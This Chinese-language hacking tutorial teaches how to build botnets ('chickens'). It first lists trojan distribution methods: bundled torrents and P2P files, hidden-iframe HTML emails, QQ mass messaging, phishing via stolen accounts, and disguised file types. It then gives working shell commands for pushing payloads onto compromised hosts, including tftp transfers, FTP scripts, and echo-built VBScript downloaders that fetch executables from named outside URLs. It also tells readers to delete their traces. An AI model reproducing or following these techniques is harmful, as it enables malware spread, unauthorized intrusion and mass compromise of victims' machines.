内容相当丰富.相信看完本
教程你一定会成为养鸡专业户.
一.目前流行
木马传播
技术.
1.用BT制作木马种子
利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的
软件然后
捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.
2.利用PP共享自己捆了木马的软件或电影.
方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人
家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla
ye木马制作.在
黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木
马.这样看电影也会中我们的马.
3.利用QQ邮箱传播木马.
这里主要点HTML格式----在里面写上以下这段代码:
<body > </body>
当人家一打开你发过去的邮件时,就会中我们的木马.
4.QQ群发网页木马。
首先,你要申请多个QQ号,然后找款QQ消息群发器(黑鹰网站可以找到大量相关QQ群
发信息软件,)再然后要加上非常具有诱惑性的消息(肉鸡的多与少与这个直接相关
,),骗取人家点你的网址。最后,在晚上时可以挂在电脑上群发带有网页木马的信
息。相信只要你的信息够诱惑,肉鸡也是成群的。
5.利用163邮箱传播网页木马。
同样,这里用HTML格式,然后填上以下代码:
</html><iframe src="你的网页木马
地址" name="zhu" width="0" height="0"
frameborder="0">
对方只要一打开,就会中我们的网页木马。
这里发送邮件时注意一些技巧,我们要加入一些社会工程会。比如对方是爱好车的,
你就在邮件标题上写上关于车的诱惑性标题。目的只有一个,让他点我们带有网页木
马的邮件。
6.利用邮箱群发我们的网页木马。
这里要用到论坛邮箱提取器,这类
工具黑鹰也有
下载,大家可以找一下。提取大量
邮箱后,配合FOXMAIL这款软件进行群发传播带有网页木马的邮件。这里也要注意技
巧,比如在一个游戏论坛提取的邮箱,你就可以伪装本论坛发给广大游戏玩家,提供
最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从
而中我们的木马. 这里还可以配合利用HTML格式群发我们的网页木马效果可更佳!
7.捆绑欺骗
这也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮
箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木
马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查
找本人的捆绑系列专辑教程.
8.攻破下载点,捆上木马放入下载点.
当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到
这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点
等待人家上钩吧!该方法抓鸡的速度也非常快.
9.钓鱼式欺骗别人点击你的网页木马地址或木马.
钓鱼式欺骗
攻击,也是国内最新发现的一种
攻击手法.主要利用社会工程会中的信任
关系骗他点击.具体的利用方法:当盗了人家的QQ号,你可以看看有几个群,然后在群里
放上自己捆绑的木马.接着在群里发几条诱惑性的信息,比如最新申请6位QQ号软件,
由于是在同一个群,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定
很大.若该QQ号主人是群主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己
的网页木马地址,然后说本群刚建的专用网站!由于是群主,他们对他的信任度可想而
知.应该都会点的吧!还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木
马,然后说刚建的个人网站.相信很多好友都会自动点击吧!
10.网站主页挂马
这个应该不用具体介绍吧,教程有N多.入侵到一个网站得到WEBSHELL后,接下来大家
是不是都忙着找首页挂马了.
11.论坛漏洞挂马
这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,
动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关
教程,不是很清楚的可以在黑鹰找到.
12.
文件类型伪装
这里主要把一些木马
服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑
器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行
文本文件,其实已经中了我们的木马.真是神不知鬼不觉!本人也做过文件类型欺骗的
动画教程.不是很清楚的也可以在黑鹰或动画吧找到本人的相关的教程.当然,还要以
伪装成其它的类型,比如把木马制作成BMP图片.BAT格式等.只要他一运行就会中
我们的马.
14.其它的传播技术:比如制作图片木马,也有专门的图片木马制作工具,RM木马制作
黑鹰也有相关教程,RealOnePlayer木马制作,FLASH木马制作.也有专门的制作工具,
网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可
以在网上找到相关资料,自己尝试制作.
二.新型
高级木马传播技术
下面介绍几种比较高级的木马传播技术.由于有一定的技术难度,所以隐蔽性比较强,
传播速度也快,而且也几乎不会被杀毒软件查杀.
1.在WORD文档中加入木马文件
这种方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就
会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使
别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一
步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些
高手使用.
2.黑客工具绑木马
其实这本来算不上高级的方法,但最近发现很多黑客软件发布站,捆了木马的工具躲过
管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客
工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从
而被他们利用.这一招是他们把黑客中的社会工程学利用的"恰到好处"!
3.用Z-file伪装加密木马程序
z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像
文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏
合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往
往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出
它内藏木马.
4.伪装成应用程序扩展组件
此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度
由于涉及到编程,所以我这里只简单介绍原理,以供参考.
采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入
DLL线程,或者挂接PSAPI,实
现木马程序的隐藏.
5.通过QQ
病毒,QQ蠕虫,QQ尾巴或邮箱
病毒,蠕虫进行传播.
相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行
分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数
级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作
器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用
QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站
进行分布式DDOS攻击.利用该技术是相当高级的,速度也是最快的.
上传木马的8种方法!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
TFTP法传输
我们最喜欢也是最方便的方式是用TFTP!这里要配合TFTP32这个小型的文件传输
服务器,TFTP 协议使用的是UDP69端口,在我们得到肉机的SHELL后可以很方便的传输文件到肉机上的!下面看我详细的讲解和操作,在我们得到的SHELL里输入 tftp –I IP get/put xx.exe就OK了,注意这里一定要记得带上参数-I,不然是不会成功的,还有要注意的是PUT是把肉鸡上的文件传到我们自己的机子上,一般常用来偷秘密文件(怎么像做贼似的);GET是从我们的机子上取文件到肉鸡上,也就是上传文件到肉鸡上,我们这里要用的是GET这个动作,因为我的IP是 222.XXX.XXX.2,所以我就在得到的SHELL里输入tftp –I 222.XXX.XXX.2 get nc.exe就是到我们的机子上取NC这个我们要上传的文件,可以是任何你想传的东西,但是最好传的文件比较小,否则容易失败.
别急着敲回车,我们还要在我们自己的机子上架好TFTP32这个软件才行,这里有个技巧,我们可以把TFTP32这个软件和我们的NC放在一个目录下,这样在取文件时就不用另外写路径了,很是方便,我们把TFTP32放在NC一个目录里打开后它就在69端口监听看有没有需要传送文件的请求,这时我们就在得到的SHELL里写好的那句话后敲回车就就等待上传成功吧~~~~~~
★二★、 Recton程序种植者直接种植
Recton程序种植者又种方法可以用,一个是依赖IPC的,一个则是通过写VBE来用HTTP法下载的,分别叙述如下:
1、IPC上传
IPC上传方式只依赖远程主机开放IPC$和目录共享,不依赖 Task Scheduler服务。具体情况参考下图,远程主机写上对方的IP地址;用户名就是你具备管理员权限的帐号;密码就是你那个帐号的密码;选则IPC上传,在本地选好要上传的文件,最后写上启动参数就OK了!
2、Http法上传
Http下载不需要远程主机开任何共享,也不依赖Task Scheduler服务。其原理是在远程主机上写入、执行一个能从 web上下载文件的VBS脚本。需要注意的是文件地址和启动参数一定要写正确,否则无法执行!文件地址一定要包含http://,如下偶写好的一个例子,运行后就会下载http://************/muma.exe并且运行。
★三★、EXE2BAT的超级应用
本例是使用一个名为exe2bat的小工具,在本地打开一个CMD,切换到exe2bat所在目录,输入:exe2bat.exe后回车,exe2bat 可以将一个应用程序(.exe)转换为一个批处理文件(.bat),而批处理文件我们是可以编辑的,下面我们就将一个开3389的小工具3389.exe 转换为批处理文件。输入:exe2bat.exe 3389.exe 3389.bat,回车后就可以得到一个名为3389.bat批处理文件。
好了,我们用记事本打开生成的批处理文件,然后点击"编辑"菜单中的"全选"和"复制"命令,将文件中的源代码除了最后2行外全部复制到剪贴板中。
再切换到我们得到的SHELL窗口里,点击右键选择"粘贴"命令把我们刚才复制的字符都粘贴进去,你会看到代码飞速变换,像黑客帝国里的镜头,很过瘾!
代码复制完成后,输入:ren tvisGRAY 3389.exe命令就可以把3389.exe还原,现在你的这个文件就传上去了。这种方法的优点是不言而喻,因为它可以直接利用已经得到的shell将文件以"代码"的形式输入到对方电脑,不需要任何
网络工具的支持,同样也不必打开任何的端口,也没有任何进程,能穿越任何防火墙。不过这种方法也有一个明显的缺点,就是上传的程序体积不能太大,不然代码的上传时间太久不说,再还原成源程序的时候也可能出现问题。
★四★、FTP法传输
有的时候我们自己的计算机没有公网IP地址,这个时候想用TFTO就比较麻烦了,如果你嫌上面的办法比较麻烦的话,那你还可以用这个比较简单的办法就是用 FTP,但是我们在得到的SHELL里不能直接登陆我们的FTP服务器去下载东西,这涉及到一些FTP协议的问题,在这里就不详述了,我们只是讨论怎么传文件嘛!当我们不能直接传的时候我们可以换个办法来实现,这个办法就是写个ftp.txt的文件来向FTP服务器提交就可以了。在我们得到的肉鸡的 SHELL里写入以下代码:
echo ftp >ftp.txt
echo open服务器ip [端口]>>ftp.txt
echo username>>ftp.txt
echo password>>ftp.txt
echo get sample.exe>>ftp.txt
echo bye>>ftp.txt
其中服务器ip就是你放你想传的文件的FTP的服务器 IP地址;username就是你登陆你的FTP的帐号;password就是你的密码;sample.exe就是你想下载的程序名字。最后一个bye是退出FTP服务器。
其中218.XXX.XX.163 就是我的FTP服务器的IP地址,iceskysl就是我的用户名,653917就是我的密码;mt.exe就是我想下载的文件。我们DIR下看看写成功这个ftp.txt么?
为了确保我们没有写错,最好还是用TYPE命令来看看这个 FTP.TXT文件的内容是不是我们想写进去的,一般来说是不会错的!接着执行ftp -s:ftp.txt 就可以下载到们的那个文件了,我这里下载的就是MT.exe这个文件,显示的就是我成功下载的提示了。
记得最后要用del ftp.txt来删掉我们写的这个TXT文件,要不被发现了我们就亏大了!现在这个文件就传上去了,接着怎么做就不要我教你了吧!
★五★、利用xiazai.vbe法
这个方法也是很简单有效的,我们在得到的肉鸡SHELL里依次写入下面这些命令来创建一个VBE文件,代码如下:
echo with w:if .arguments.count^<2 then .quit:end if >xiazai.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>xiazai.vbe
echo web.open "get",.arguments
,0:web.send:if web.status^>200 then quit >>xiazai.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>xiazai.vbe
这样就会在肉鸡中生成一个xiazai.vbe的文件,如下图是我演示的一个结果显示,我们通过DIR可以看到这个xiazai.vbe文件已经成功创建了。
现在我们只要输入c xianzai.vbe
http://iceskysl.e2u.cc/server.exe mtt.exe就可以把
http://iceskysl.e2u.cc/server.exe这个地址下的这个server.exe下载到肉鸡中并且改名字为mtt.exe,目的达到,接着怎么做,我就不多说了!
★六★、利用iget.vbe法
这个方法同上面的那个差不多,只是写法不一样,具体的还是在肉鸡SHELL中写入下面的代码:
echo iLocal = LCase(W.Arguments(1)) >iget.vbe
echo iRemote = LCase(W.Arguments
) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
这样写好后就可以这样执行了c iget.vbe
http://icesky.com/muma.exe mm.exe 就可以把
http://icesky.com/muma.exe这个地址的程序muma.exe下载下来并且改名字为mm.exe。
★七★、利用Http网站vbe法
这个就是我们前面讲的那个Recton程序种植者所用的HTTP法下载的原理,我们在得到的肉鸡的SHELL里依次写入下面这些:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >dsa.vbe
echo xPost.Open "GET","
http://d.thec.cn/mygoit/readme.exe";,0 >>dsa.vbe
echo xPost.Send() >>dsa.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe
echo sGet.Mode = 3 >>dsa.vbe
echo sGet.Type = 1 >>dsa.vbe
echo sGet.Open() >>dsa.vbe
echo sGet.Write(xPost.responseBody) >>dsa.vbe
echo sGet.SaveToFile "readme.exe",2 >>dsa.vbe
写好后执行:c dsa.vbe 就可以把你上面的那个地址("http://***.*/sample.exe,注意要换成你自己放程序的地址)下的文件下载下来了,最后同样别忘记了用del dsa.vbe删掉我们刚才写的那个文件哦!
★八★、 3389法
如果你得到的主机是可以开3389的,那就更加好办了,我们有很多的办法开3389,(这个到底怎么开就不在这个专题之内了,你可以查阅相关资料或者写次再写这个专题的内容)你就可以开了他的3389,再自己加个帐号,然后登陆,在它的3389桌面环境下进行"本地"下载,该方法还有个好处就是对服务器上传很严格的机器特有效。(包括硬件防火墙)
